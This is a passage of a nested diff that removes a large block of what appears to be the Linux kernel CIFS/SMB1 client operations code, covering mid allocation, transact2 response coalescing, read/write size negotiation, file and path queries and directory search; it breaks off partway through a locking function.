+-cifs_find_mid(struct TCP_Server_Info *server, char *buffer)
+-{
+-	struct smb_hdr *buf = (struct smb_hdr *)buffer;
+-	struct mid_q_entry *mid;
+-
+-	spin_lock(&server->mid_lock);
+-	list_for_each_entry(mid, &server->pending_mid_q, qhead) {
+-		if (compare_mid(mid->mid, buf) &&
+-		    mid->mid_state == MID_REQUEST_SUBMITTED &&
+-		    le16_to_cpu(mid->command) == buf->Command) {
+-			kref_get(&mid->refcount);
+-			spin_unlock(&server->mid_lock);
+-			return mid;
+-		}
+-	}
+-	spin_unlock(&server->mid_lock);
+-	return NULL;
+-}
+-
+-static void
+-cifs_add_credits(struct TCP_Server_Info *server,
+-		 const struct cifs_credits *credits, const int optype)
+-{
+-	spin_lock(&server->req_lock);
+-	server->credits += credits->value;
+-	server->in_flight--;
+-	spin_unlock(&server->req_lock);
+-	wake_up(&server->request_q);
+-}
+-
+-static void
+-cifs_set_credits(struct TCP_Server_Info *server, const int val)
+-{
+-	spin_lock(&server->req_lock);
+-	server->credits = val;
+-	server->oplocks = val > 1 ? enable_oplocks : false;
+-	spin_unlock(&server->req_lock);
+-}
+-
+-static int *
+-cifs_get_credits_field(struct TCP_Server_Info *server, const int optype)
+-{
+-	return &server->credits;
+-}
+-
+-static unsigned int
+-cifs_get_credits(struct mid_q_entry *mid)
+-{
+-	return 1;
+-}
+-
+-/*
+- * Find a free multiplex id (SMB mid). Otherwise there could be
+- * mid collisions which might cause problems, demultiplexing the
+- * wrong response to this request. Multiplex ids could collide if
+- * one of a series requests takes much longer than the others, or
+- * if a very large number of long lived requests (byte range
+- * locks or FindNotify requests) are pending. No more than
+- * 64K-1 requests can be outstanding at one time. If no
+- * mids are available, return zero. A future optimization
+- * could make the combination of mids and uid the key we use
+- * to demultiplex on (rather than mid alone).
+- * In addition to the above check, the cifs demultiplex
+- * code already used the command code as a secondary
+- * check of the frame and if signing is negotiated the
+- * response would be discarded if the mid were the same
+- * but the signature was wrong. Since the mid is not put in the
+- * pending queue until later (when it is about to be dispatched)
+- * we do have to limit the number of outstanding requests
+- * to somewhat less than 64K-1 although it is hard to imagine
+- * so many threads being in the vfs at one time.
+- */
+-static __u64
+-cifs_get_next_mid(struct TCP_Server_Info *server)
+-{
+-	__u64 mid = 0;
+-	__u16 last_mid, cur_mid;
+-	bool collision, reconnect = false;
+-
+-	spin_lock(&server->mid_lock);
+-
+-	/* mid is 16 bit only for CIFS/SMB */
+-	cur_mid = (__u16)((server->CurrentMid) & 0xffff);
+-	/* we do not want to loop forever */
+-	last_mid = cur_mid;
+-	cur_mid++;
+-	/* avoid 0xFFFF MID */
+-	if (cur_mid == 0xffff)
+-		cur_mid++;
+-
+-	/*
+-	 * This nested loop looks more expensive than it is.
+-	 * In practice the list of pending requests is short,
+-	 * fewer than 50, and the mids are likely to be unique
+-	 * on the first pass through the loop unless some request
+-	 * takes longer than the 64 thousand requests before it
+-	 * (and it would also have to have been a request that
+-	 * did not time out).
+-	 */
+-	while (cur_mid != last_mid) {
+-		struct mid_q_entry *mid_entry;
+-		unsigned int num_mids;
+-
+-		collision = false;
+-		if (cur_mid == 0)
+-			cur_mid++;
+-
+-		num_mids = 0;
+-		list_for_each_entry(mid_entry, &server->pending_mid_q, qhead) {
+-			++num_mids;
+-			if (mid_entry->mid == cur_mid &&
+-			    mid_entry->mid_state == MID_REQUEST_SUBMITTED) {
+-				/* This mid is in use, try a different one */
+-				collision = true;
+-				break;
+-			}
+-		}
+-
+-		/*
+-		 * if we have more than 32k mids in the list, then something
+-		 * is very wrong. Possibly a local user is trying to DoS the
+-		 * box by issuing long-running calls and SIGKILL'ing them. If
+-		 * we get to 2^16 mids then we're in big trouble as this
+-		 * function could loop forever.
+-		 *
+-		 * Go ahead and assign out the mid in this situation, but force
+-		 * an eventual reconnect to clean out the pending_mid_q.
+-		 */
+-		if (num_mids > 32768)
+-			reconnect = true;
+-
+-		if (!collision) {
+-			mid = (__u64)cur_mid;
+-			server->CurrentMid = mid;
+-			break;
+-		}
+-		cur_mid++;
+-	}
+-	spin_unlock(&server->mid_lock);
+-
+-	if (reconnect) {
+-		cifs_signal_cifsd_for_reconnect(server, false);
+-	}
+-
+-	return mid;
+-}
+-
+-/*
+-	return codes:
+-		0	not a transact2, or all data present
+-		>0	transact2 with that much data missing
+-		-EINVAL	invalid transact2
+- */
+-static int
+-check2ndT2(char *buf)
+-{
+-	struct smb_hdr *pSMB = (struct smb_hdr *)buf;
+-	struct smb_t2_rsp *pSMBt;
+-	int remaining;
+-	__u16 total_data_size, data_in_this_rsp;
+-
+-	if (pSMB->Command != SMB_COM_TRANSACTION2)
+-		return 0;
+-
+-	/* check for plausible wct, bcc and t2 data and parm sizes */
+-	/* check for parm and data offset going beyond end of smb */
+-	if (pSMB->WordCount != 10) { /* coalesce_t2 depends on this */
+-		cifs_dbg(FYI, "Invalid transact2 word count\n");
+-		return -EINVAL;
+-	}
+-
+-	pSMBt = (struct smb_t2_rsp *)pSMB;
+-
+-	total_data_size = get_unaligned_le16(&pSMBt->t2_rsp.TotalDataCount);
+-	data_in_this_rsp = get_unaligned_le16(&pSMBt->t2_rsp.DataCount);
+-
+-	if (total_data_size == data_in_this_rsp)
+-		return 0;
+-	else if (total_data_size < data_in_this_rsp) {
+-		cifs_dbg(FYI, "total data %d smaller than data in frame %d\n",
+-			 total_data_size, data_in_this_rsp);
+-		return -EINVAL;
+-	}
+-
+-	remaining = total_data_size - data_in_this_rsp;
+-
+-	cifs_dbg(FYI, "missing %d bytes from transact2, check next response\n",
+-		 remaining);
+-	if (total_data_size > CIFSMaxBufSize) {
+-		cifs_dbg(VFS, "TotalDataSize %d is over maximum buffer %d\n",
+-			 total_data_size, CIFSMaxBufSize);
+-		return -EINVAL;
+-	}
+-	return remaining;
+-}
+-
+-static int
+-coalesce_t2(char *second_buf, struct smb_hdr *target_hdr)
+-{
+-	struct smb_t2_rsp *pSMBs = (struct smb_t2_rsp *)second_buf;
+-	struct smb_t2_rsp *pSMBt  = (struct smb_t2_rsp *)target_hdr;
+-	char *data_area_of_tgt;
+-	char *data_area_of_src;
+-	int remaining;
+-	unsigned int byte_count, total_in_tgt;
+-	__u16 tgt_total_cnt, src_total_cnt, total_in_src;
+-
+-	src_total_cnt = get_unaligned_le16(&pSMBs->t2_rsp.TotalDataCount);
+-	tgt_total_cnt = get_unaligned_le16(&pSMBt->t2_rsp.TotalDataCount);
+-
+-	if (tgt_total_cnt != src_total_cnt)
+-		cifs_dbg(FYI, "total data count of primary and secondary t2 differ source=%hu target=%hu\n",
+-			 src_total_cnt, tgt_total_cnt);
+-
+-	total_in_tgt = get_unaligned_le16(&pSMBt->t2_rsp.DataCount);
+-
+-	remaining = tgt_total_cnt - total_in_tgt;
+-
+-	if (remaining < 0) {
+-		cifs_dbg(FYI, "Server sent too much data. tgt_total_cnt=%hu total_in_tgt=%u\n",
+-			 tgt_total_cnt, total_in_tgt);
+-		return -EPROTO;
+-	}
+-
+-	if (remaining == 0) {
+-		/* nothing to do, ignore */
+-		cifs_dbg(FYI, "no more data remains\n");
+-		return 0;
+-	}
+-
+-	total_in_src = get_unaligned_le16(&pSMBs->t2_rsp.DataCount);
+-	if (remaining < total_in_src)
+-		cifs_dbg(FYI, "transact2 2nd response contains too much data\n");
+-
+-	/* find end of first SMB data area */
+-	data_area_of_tgt = (char *)&pSMBt->hdr.Protocol +
+-				get_unaligned_le16(&pSMBt->t2_rsp.DataOffset);
+-
+-	/* validate target area */
+-	data_area_of_src = (char *)&pSMBs->hdr.Protocol +
+-				get_unaligned_le16(&pSMBs->t2_rsp.DataOffset);
+-
+-	data_area_of_tgt += total_in_tgt;
+-
+-	total_in_tgt += total_in_src;
+-	/* is the result too big for the field? */
+-	if (total_in_tgt > USHRT_MAX) {
+-		cifs_dbg(FYI, "coalesced DataCount too large (%u)\n",
+-			 total_in_tgt);
+-		return -EPROTO;
+-	}
+-	put_unaligned_le16(total_in_tgt, &pSMBt->t2_rsp.DataCount);
+-
+-	/* fix up the BCC */
+-	byte_count = get_bcc(target_hdr);
+-	byte_count += total_in_src;
+-	/* is the result too big for the field? */
+-	if (byte_count > USHRT_MAX) {
+-		cifs_dbg(FYI, "coalesced BCC too large (%u)\n", byte_count);
+-		return -EPROTO;
+-	}
+-	put_bcc(byte_count, target_hdr);
+-
+-	byte_count = be32_to_cpu(target_hdr->smb_buf_length);
+-	byte_count += total_in_src;
+-	/* don't allow buffer to overflow */
+-	if (byte_count > CIFSMaxBufSize + MAX_CIFS_HDR_SIZE - 4) {
+-		cifs_dbg(FYI, "coalesced BCC exceeds buffer size (%u)\n",
+-			 byte_count);
+-		return -ENOBUFS;
+-	}
+-	target_hdr->smb_buf_length = cpu_to_be32(byte_count);
+-
+-	/* copy second buffer into end of first buffer */
+-	memcpy(data_area_of_tgt, data_area_of_src, total_in_src);
+-
+-	if (remaining != total_in_src) {
+-		/* more responses to go */
+-		cifs_dbg(FYI, "waiting for more secondary responses\n");
+-		return 1;
+-	}
+-
+-	/* we are done */
+-	cifs_dbg(FYI, "found the last secondary response\n");
+-	return 0;
+-}
+-
+-static void
+-cifs_downgrade_oplock(struct TCP_Server_Info *server,
+-		      struct cifsInodeInfo *cinode, __u32 oplock,
+-		      unsigned int epoch, bool *purge_cache)
+-{
+-	cifs_set_oplock_level(cinode, oplock);
+-}
+-
+-static bool
+-cifs_check_trans2(struct mid_q_entry *mid, struct TCP_Server_Info *server,
+-		  char *buf, int malformed)
+-{
+-	if (malformed)
+-		return false;
+-	if (check2ndT2(buf) <= 0)
+-		return false;
+-	mid->multiRsp = true;
+-	if (mid->resp_buf) {
+-		/* merge response - fix up 1st*/
+-		malformed = coalesce_t2(buf, mid->resp_buf);
+-		if (malformed > 0)
+-			return true;
+-		/* All parts received or packet is malformed. */
+-		mid->multiEnd = true;
+-		dequeue_mid(mid, malformed);
+-		return true;
+-	}
+-	if (!server->large_buf) {
+-		/*FIXME: switch to already allocated largebuf?*/
+-		cifs_dbg(VFS, "1st trans2 resp needs bigbuf\n");
+-	} else {
+-		/* Have first buffer */
+-		mid->resp_buf = buf;
+-		mid->large_buf = true;
+-		server->bigbuf = NULL;
+-	}
+-	return true;
+-}
+-
+-static bool
+-cifs_need_neg(struct TCP_Server_Info *server)
+-{
+-	return server->maxBuf == 0;
+-}
+-
+-static int
+-cifs_negotiate(const unsigned int xid,
+-	       struct cifs_ses *ses,
+-	       struct TCP_Server_Info *server)
+-{
+-	int rc;
+-	rc = CIFSSMBNegotiate(xid, ses, server);
+-	if (rc == -EAGAIN) {
+-		/* retry only once on 1st time connection */
+-		set_credits(server, 1);
+-		rc = CIFSSMBNegotiate(xid, ses, server);
+-		if (rc == -EAGAIN)
+-			rc = -EHOSTDOWN;
+-	}
+-	return rc;
+-}
+-
+-static unsigned int
+-cifs_negotiate_wsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+-{
+-	__u64 unix_cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	unsigned int wsize;
+-
+-	/* start with specified wsize, or default */
+-	if (ctx->wsize)
+-		wsize = ctx->wsize;
+-	else if (tcon->unix_ext && (unix_cap & CIFS_UNIX_LARGE_WRITE_CAP))
+-		wsize = CIFS_DEFAULT_IOSIZE;
+-	else
+-		wsize = CIFS_DEFAULT_NON_POSIX_WSIZE;
+-
+-	/* can server support 24-bit write sizes? (via UNIX extensions) */
+-	if (!tcon->unix_ext || !(unix_cap & CIFS_UNIX_LARGE_WRITE_CAP))
+-		wsize = min_t(unsigned int, wsize, CIFS_MAX_RFC1002_WSIZE);
+-
+-	/*
+-	 * no CAP_LARGE_WRITE_X or is signing enabled without CAP_UNIX set?
+-	 * Limit it to max buffer offered by the server, minus the size of the
+-	 * WRITEX header, not including the 4 byte RFC1001 length.
+-	 */
+-	if (!(server->capabilities & CAP_LARGE_WRITE_X) ||
+-	    (!(server->capabilities & CAP_UNIX) && server->sign))
+-		wsize = min_t(unsigned int, wsize,
+-				server->maxBuf - sizeof(WRITE_REQ) + 4);
+-
+-	/* hard limit of CIFS_MAX_WSIZE */
+-	wsize = min_t(unsigned int, wsize, CIFS_MAX_WSIZE);
+-
+-	return wsize;
+-}
+-
+-static unsigned int
+-cifs_negotiate_rsize(struct cifs_tcon *tcon, struct smb3_fs_context *ctx)
+-{
+-	__u64 unix_cap = le64_to_cpu(tcon->fsUnixInfo.Capability);
+-	struct TCP_Server_Info *server = tcon->ses->server;
+-	unsigned int rsize, defsize;
+-
+-	/*
+-	 * Set default value...
+-	 *
+-	 * HACK alert! Ancient servers have very small buffers. Even though
+-	 * MS-CIFS indicates that servers are only limited by the client's
+-	 * bufsize for reads, testing against win98se shows that it throws
+-	 * INVALID_PARAMETER errors if you try to request too large a read.
+-	 * OS/2 just sends back short reads.
+-	 *
+-	 * If the server doesn't advertise CAP_LARGE_READ_X, then assume that
+-	 * it can't handle a read request larger than its MaxBufferSize either.
+-	 */
+-	if (tcon->unix_ext && (unix_cap & CIFS_UNIX_LARGE_READ_CAP))
+-		defsize = CIFS_DEFAULT_IOSIZE;
+-	else if (server->capabilities & CAP_LARGE_READ_X)
+-		defsize = CIFS_DEFAULT_NON_POSIX_RSIZE;
+-	else
+-		defsize = server->maxBuf - sizeof(READ_RSP);
+-
+-	rsize = ctx->rsize ? ctx->rsize : defsize;
+-
+-	/*
+-	 * no CAP_LARGE_READ_X? Then MS-CIFS states that we must limit this to
+-	 * the client's MaxBufferSize.
+-	 */
+-	if (!(server->capabilities & CAP_LARGE_READ_X))
+-		rsize = min_t(unsigned int, CIFSMaxBufSize, rsize);
+-
+-	/* hard limit of CIFS_MAX_RSIZE */
+-	rsize = min_t(unsigned int, rsize, CIFS_MAX_RSIZE);
+-
+-	return rsize;
+-}
+-
+-static void
+-cifs_qfs_tcon(const unsigned int xid, struct cifs_tcon *tcon,
+-	      struct cifs_sb_info *cifs_sb)
+-{
+-	CIFSSMBQFSDeviceInfo(xid, tcon);
+-	CIFSSMBQFSAttributeInfo(xid, tcon);
+-}
+-
+-static int
+-cifs_is_path_accessible(const unsigned int xid, struct cifs_tcon *tcon,
+-			struct cifs_sb_info *cifs_sb, const char *full_path)
+-{
+-	int rc;
+-	FILE_ALL_INFO *file_info;
+-
+-	file_info = kmalloc(sizeof(FILE_ALL_INFO), GFP_KERNEL);
+-	if (file_info == NULL)
+-		return -ENOMEM;
+-
+-	rc = CIFSSMBQPathInfo(xid, tcon, full_path, file_info,
+-			      0 /* not legacy */, cifs_sb->local_nls,
+-			      cifs_remap(cifs_sb));
+-
+-	if (rc == -EOPNOTSUPP || rc == -EINVAL)
+-		rc = SMBQueryInformation(xid, tcon, full_path, file_info,
+-				cifs_sb->local_nls, cifs_remap(cifs_sb));
+-	kfree(file_info);
+-	return rc;
+-}
+-
+-static int cifs_query_path_info(const unsigned int xid, struct cifs_tcon *tcon,
+-				struct cifs_sb_info *cifs_sb, const char *full_path,
+-				struct cifs_open_info_data *data, bool *adjustTZ, bool *symlink)
+-{
+-	int rc;
+-	FILE_ALL_INFO fi = {};
+-
+-	*symlink = false;
+-
+-	/* could do find first instead but this returns more info */
+-	rc = CIFSSMBQPathInfo(xid, tcon, full_path, &fi, 0 /* not legacy */, cifs_sb->local_nls,
+-			      cifs_remap(cifs_sb));
+-	/*
+-	 * BB optimize code so we do not make the above call when server claims
+-	 * no NT SMB support and the above call failed at least once - set flag
+-	 * in tcon or mount.
+-	 */
+-	if ((rc == -EOPNOTSUPP) || (rc == -EINVAL)) {
+-		rc = SMBQueryInformation(xid, tcon, full_path, &fi, cifs_sb->local_nls,
+-					 cifs_remap(cifs_sb));
+-		*adjustTZ = true;
+-	}
+-
+-	if (!rc) {
+-		int tmprc;
+-		int oplock = 0;
+-		struct cifs_fid fid;
+-		struct cifs_open_parms oparms;
+-
+-		move_cifs_info_to_smb2(&data->fi, &fi);
+-
+-		if (!(le32_to_cpu(fi.Attributes) & ATTR_REPARSE))
+-			return 0;
+-
+-		oparms = (struct cifs_open_parms) {
+-			.tcon = tcon,
+-			.cifs_sb = cifs_sb,
+-			.desired_access = FILE_READ_ATTRIBUTES,
+-			.create_options = cifs_create_options(cifs_sb, 0),
+-			.disposition = FILE_OPEN,
+-			.path = full_path,
+-			.fid = &fid,
+-		};
+-
+-		/* Need to check if this is a symbolic link or not */
+-		tmprc = CIFS_open(xid, &oparms, &oplock, NULL);
+-		if (tmprc == -EOPNOTSUPP)
+-			*symlink = true;
+-		else if (tmprc == 0)
+-			CIFSSMBClose(xid, tcon, fid.netfid);
+-	}
+-
+-	return rc;
+-}
+-
+-static int cifs_get_srv_inum(const unsigned int xid, struct cifs_tcon *tcon,
+-			     struct cifs_sb_info *cifs_sb, const char *full_path,
+-			     u64 *uniqueid, struct cifs_open_info_data *unused)
+-{
+-	/*
+-	 * We can not use the IndexNumber field by default from Windows or
+-	 * Samba (in ALL_INFO buf) but we can request it explicitly. The SNIA
+-	 * CIFS spec claims that this value is unique within the scope of a
+-	 * share, and the windows docs hint that it's actually unique
+-	 * per-machine.
+-	 *
+-	 * There may be higher info levels that work but are there Windows
+-	 * server or network appliances for which IndexNumber field is not
+-	 * guaranteed unique?
+-	 */
+-	return CIFSGetSrvInodeNumber(xid, tcon, full_path, uniqueid,
+-				     cifs_sb->local_nls,
+-				     cifs_remap(cifs_sb));
+-}
+-
+-static int cifs_query_file_info(const unsigned int xid, struct cifs_tcon *tcon,
+-				struct cifsFileInfo *cfile, struct cifs_open_info_data *data)
+-{
+-	int rc;
+-	FILE_ALL_INFO fi = {};
+-
+-	if (cfile->symlink_target) {
+-		data->symlink_target = kstrdup(cfile->symlink_target, GFP_KERNEL);
+-		if (!data->symlink_target)
+-			return -ENOMEM;
+-	}
+-
+-	rc = CIFSSMBQFileInfo(xid, tcon, cfile->fid.netfid, &fi);
+-	if (!rc)
+-		move_cifs_info_to_smb2(&data->fi, &fi);
+-	return rc;
+-}
+-
+-static void
+-cifs_clear_stats(struct cifs_tcon *tcon)
+-{
+-	atomic_set(&tcon->stats.cifs_stats.num_writes, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_reads, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_flushes, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_oplock_brks, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_opens, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_posixopens, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_posixmkdirs, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_closes, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_deletes, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_mkdirs, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_rmdirs, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_renames, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_t2renames, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_ffirst, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_fnext, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_fclose, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_hardlinks, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_symlinks, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_locks, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_acl_get, 0);
+-	atomic_set(&tcon->stats.cifs_stats.num_acl_set, 0);
+-}
+-
+-static void
+-cifs_print_stats(struct seq_file *m, struct cifs_tcon *tcon)
+-{
+-	seq_printf(m, " Oplocks breaks: %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_oplock_brks));
+-	seq_printf(m, "\nReads:  %d Bytes: %llu",
+-		   atomic_read(&tcon->stats.cifs_stats.num_reads),
+-		   (long long)(tcon->bytes_read));
+-	seq_printf(m, "\nWrites: %d Bytes: %llu",
+-		   atomic_read(&tcon->stats.cifs_stats.num_writes),
+-		   (long long)(tcon->bytes_written));
+-	seq_printf(m, "\nFlushes: %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_flushes));
+-	seq_printf(m, "\nLocks: %d HardLinks: %d Symlinks: %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_locks),
+-		   atomic_read(&tcon->stats.cifs_stats.num_hardlinks),
+-		   atomic_read(&tcon->stats.cifs_stats.num_symlinks));
+-	seq_printf(m, "\nOpens: %d Closes: %d Deletes: %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_opens),
+-		   atomic_read(&tcon->stats.cifs_stats.num_closes),
+-		   atomic_read(&tcon->stats.cifs_stats.num_deletes));
+-	seq_printf(m, "\nPosix Opens: %d Posix Mkdirs: %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_posixopens),
+-		   atomic_read(&tcon->stats.cifs_stats.num_posixmkdirs));
+-	seq_printf(m, "\nMkdirs: %d Rmdirs: %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_mkdirs),
+-		   atomic_read(&tcon->stats.cifs_stats.num_rmdirs));
+-	seq_printf(m, "\nRenames: %d T2 Renames %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_renames),
+-		   atomic_read(&tcon->stats.cifs_stats.num_t2renames));
+-	seq_printf(m, "\nFindFirst: %d FNext %d FClose %d",
+-		   atomic_read(&tcon->stats.cifs_stats.num_ffirst),
+-		   atomic_read(&tcon->stats.cifs_stats.num_fnext),
+-		   atomic_read(&tcon->stats.cifs_stats.num_fclose));
+-}
+-
+-static void
+-cifs_mkdir_setinfo(struct inode *inode, const char *full_path,
+-		   struct cifs_sb_info *cifs_sb, struct cifs_tcon *tcon,
+-		   const unsigned int xid)
+-{
+-	FILE_BASIC_INFO info;
+-	struct cifsInodeInfo *cifsInode;
+-	u32 dosattrs;
+-	int rc;
+-
+-	memset(&info, 0, sizeof(info));
+-	cifsInode = CIFS_I(inode);
+-	dosattrs = cifsInode->cifsAttrs|ATTR_READONLY;
+-	info.Attributes = cpu_to_le32(dosattrs);
+-	rc = CIFSSMBSetPathInfo(xid, tcon, full_path, &info, cifs_sb->local_nls,
+-				cifs_sb);
+-	if (rc == 0)
+-		cifsInode->cifsAttrs = dosattrs;
+-}
+-
+-static int cifs_open_file(const unsigned int xid, struct cifs_open_parms *oparms, __u32 *oplock,
+-			  void *buf)
+-{
+-	struct cifs_open_info_data *data = buf;
+-	FILE_ALL_INFO fi = {};
+-	int rc;
+-
+-	if (!(oparms->tcon->ses->capabilities & CAP_NT_SMBS))
+-		rc = SMBLegacyOpen(xid, oparms->tcon, oparms->path,
+-				   oparms->disposition,
+-				   oparms->desired_access,
+-				   oparms->create_options,
+-				   &oparms->fid->netfid, oplock, &fi,
+-				   oparms->cifs_sb->local_nls,
+-				   cifs_remap(oparms->cifs_sb));
+-	else
+-		rc = CIFS_open(xid, oparms, oplock, &fi);
+-
+-	if (!rc && data)
+-		move_cifs_info_to_smb2(&data->fi, &fi);
+-
+-	return rc;
+-}
+-
+-static void
+-cifs_set_fid(struct cifsFileInfo *cfile, struct cifs_fid *fid, __u32 oplock)
+-{
+-	struct cifsInodeInfo *cinode = CIFS_I(d_inode(cfile->dentry));
+-	cfile->fid.netfid = fid->netfid;
+-	cifs_set_oplock_level(cinode, oplock);
+-	cinode->can_cache_brlcks = CIFS_CACHE_WRITE(cinode);
+-}
+-
+-static void
+-cifs_close_file(const unsigned int xid, struct cifs_tcon *tcon,
+-		struct cifs_fid *fid)
+-{
+-	CIFSSMBClose(xid, tcon, fid->netfid);
+-}
+-
+-static int
+-cifs_flush_file(const unsigned int xid, struct cifs_tcon *tcon,
+-		struct cifs_fid *fid)
+-{
+-	return CIFSSMBFlush(xid, tcon, fid->netfid);
+-}
+-
+-static int
+-cifs_sync_read(const unsigned int xid, struct cifs_fid *pfid,
+-	       struct cifs_io_parms *parms, unsigned int *bytes_read,
+-	       char **buf, int *buf_type)
+-{
+-	parms->netfid = pfid->netfid;
+-	return CIFSSMBRead(xid, parms, bytes_read, buf, buf_type);
+-}
+-
+-static int
+-cifs_sync_write(const unsigned int xid, struct cifs_fid *pfid,
+-		struct cifs_io_parms *parms, unsigned int *written,
+-		struct kvec *iov, unsigned long nr_segs)
+-{
+-
+-	parms->netfid = pfid->netfid;
+-	return CIFSSMBWrite2(xid, parms, written, iov, nr_segs);
+-}
+-
+-static int
+-smb_set_file_info(struct inode *inode, const char *full_path,
+-		  FILE_BASIC_INFO *buf, const unsigned int xid)
+-{
+-	int oplock = 0;
+-	int rc;
+-	__u32 netpid;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	struct cifsFileInfo *open_file;
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct tcon_link *tlink = NULL;
+-	struct cifs_tcon *tcon;
+-
+-	/* if the file is already open for write, just use that fileid */
+-	open_file = find_writable_file(cinode, FIND_WR_FSUID_ONLY);
+-	if (open_file) {
+-		fid.netfid = open_file->fid.netfid;
+-		netpid = open_file->pid;
+-		tcon = tlink_tcon(open_file->tlink);
+-		goto set_via_filehandle;
+-	}
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink)) {
+-		rc = PTR_ERR(tlink);
+-		tlink = NULL;
+-		goto out;
+-	}
+-	tcon = tlink_tcon(tlink);
+-
+-	rc = CIFSSMBSetPathInfo(xid, tcon, full_path, buf, cifs_sb->local_nls,
+-				cifs_sb);
+-	if (rc == 0) {
+-		cinode->cifsAttrs = le32_to_cpu(buf->Attributes);
+-		goto out;
+-	} else if (rc != -EOPNOTSUPP && rc != -EINVAL) {
+-		goto out;
+-	}
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = SYNCHRONIZE | FILE_WRITE_ATTRIBUTES,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR),
+-		.disposition = FILE_OPEN,
+-		.path = full_path,
+-		.fid = &fid,
+-	};
+-
+-	cifs_dbg(FYI, "calling SetFileInfo since SetPathInfo for times not supported by this server\n");
+-	rc = CIFS_open(xid, &oparms, &oplock, NULL);
+-	if (rc != 0) {
+-		if (rc == -EIO)
+-			rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	netpid = current->tgid;
+-
+-set_via_filehandle:
+-	rc = CIFSSMBSetFileInfo(xid, tcon, buf, fid.netfid, netpid);
+-	if (!rc)
+-		cinode->cifsAttrs = le32_to_cpu(buf->Attributes);
+-
+-	if (open_file == NULL)
+-		CIFSSMBClose(xid, tcon, fid.netfid);
+-	else
+-		cifsFileInfo_put(open_file);
+-out:
+-	if (tlink != NULL)
+-		cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-static int
+-cifs_set_compression(const unsigned int xid, struct cifs_tcon *tcon,
+-		   struct cifsFileInfo *cfile)
+-{
+-	return CIFSSMB_set_compression(xid, tcon, cfile->fid.netfid);
+-}
+-
+-static int
+-cifs_query_dir_first(const unsigned int xid, struct cifs_tcon *tcon,
+-		     const char *path, struct cifs_sb_info *cifs_sb,
+-		     struct cifs_fid *fid, __u16 search_flags,
+-		     struct cifs_search_info *srch_inf)
+-{
+-	int rc;
+-
+-	rc = CIFSFindFirst(xid, tcon, path, cifs_sb,
+-			   &fid->netfid, search_flags, srch_inf, true);
+-	if (rc)
+-		cifs_dbg(FYI, "find first failed=%d\n", rc);
+-	return rc;
+-}
+-
+-static int
+-cifs_query_dir_next(const unsigned int xid, struct cifs_tcon *tcon,
+-		    struct cifs_fid *fid, __u16 search_flags,
+-		    struct cifs_search_info *srch_inf)
+-{
+-	return CIFSFindNext(xid, tcon, fid->netfid, search_flags, srch_inf);
+-}
+-
+-static int
+-cifs_close_dir(const unsigned int xid, struct cifs_tcon *tcon,
+-	       struct cifs_fid *fid)
+-{
+-	return CIFSFindClose(xid, tcon, fid->netfid);
+-}
+-
+-static int
+-cifs_oplock_response(struct cifs_tcon *tcon, __u64 persistent_fid,
+-		__u64 volatile_fid, __u16 net_fid, struct cifsInodeInfo *cinode)
+-{
+-	return CIFSSMBLock(0, tcon, net_fid, current->tgid, 0, 0, 0, 0,
+-			   LOCKING_ANDX_OPLOCK_RELEASE, false, CIFS_CACHE_READ(cinode) ? 1 : 0);
+-}
+-
+-static int
+-cifs_queryfs(const unsigned int xid, struct cifs_tcon *tcon,
+-	     struct cifs_sb_info *cifs_sb, struct kstatfs *buf)
+-{
+-	int rc = -EOPNOTSUPP;
+-
+-	buf->f_type = CIFS_SUPER_MAGIC;
+-
+-	/*
+-	 * We could add a second check for a QFS Unix capability bit
+-	 */
+-	if ((tcon->ses->capabilities & CAP_UNIX) &&
+-	    (CIFS_POSIX_EXTENSIONS & le64_to_cpu(tcon->fsUnixInfo.Capability)))
+-		rc = CIFSSMBQFSPosixInfo(xid, tcon, buf);
+-
+-	/*
+-	 * Only need to call the old QFSInfo if failed on newer one,
+-	 * e.g. by OS/2.
+-	 **/
+-	if (rc && (tcon->ses->capabilities & CAP_NT_SMBS))
+-		rc = CIFSSMBQFSInfo(xid, tcon, buf);
+-
+-	/*
+-	 * Some old Windows servers also do not support level 103, retry with
+-	 * older level one if old server failed the previous call or we
+-	 * bypassed it because we detected that this was an older LANMAN sess
+-	 */
+-	if (rc)
+-		rc = SMBOldQFSInfo(xid, tcon, buf);
+-	return rc;
+-}
+-
+-static int
+-cifs_mand_lock(const unsigned int xid, struct cifsFileInfo *cfile, __u64 offset,
+-	       __u64 length, __u32 type, int lock, int unlock, bool wait)
+-{
+-	return CIFSSMBLock(xid, tlink_tcon(cfile->tlink), cfile->fid.netfid,
